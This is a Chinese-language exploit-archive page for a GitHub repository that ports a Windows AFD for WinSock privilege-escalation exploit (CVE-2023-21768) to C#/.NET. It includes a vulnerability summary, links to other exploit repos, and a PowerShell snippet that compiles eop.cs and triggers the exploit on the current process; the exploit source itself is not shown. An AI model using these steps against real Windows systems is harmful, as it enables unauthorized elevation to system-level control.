POC详情: 6d32bda0e0be4e1597d3e0013c1d2df016a7584d

来源
https://github.com/xboxoneresearch/CVE-2023-21768-dotnet
关联漏洞
标题: Microsoft Windows Ancillary Function Driver for WinSock 安全漏洞 (CVE-2023-21768)
描述:Microsoft Windows Ancillary Function Driver for WinSock是美国微软(Microsoft)公司的Winsock 的辅助功能驱动程序。 Microsoft Windows Ancillary Function Driver for WinSock存在安全漏洞。攻击者利用该漏洞可以提升权限。
描述
C# / .NET version of CVE-2023-21768
介绍
# CVE-2023-21768 - Dotnet

Dotnet / c# port of AFD-for-WinSock-EoP exploit

References:

- https://github.com/zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit
- https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768

## Why?

Sometimes you can't use compiled binaries.

## How to?

```powershell
$PWSH_PID = ([System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -ExpandProperty ID)
echo "[*] Current powershell PID: $PWSH_PID"
echo "[+] Compiling EoP exploit"
Add-Type -Path eop.cs -CompilerOptions "-unsafe"
echo "[+] Triggering exploit"
[XOR.EoP]::Run($PWSH_PID)
echo "[+] Exploit finished"
```
文件快照

 [4.0K]  /data/pocs/6d32bda0e0be4e1597d3e0013c1d2df016a7584d
├── [ 58K]  eop.cs
└── [ 622]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。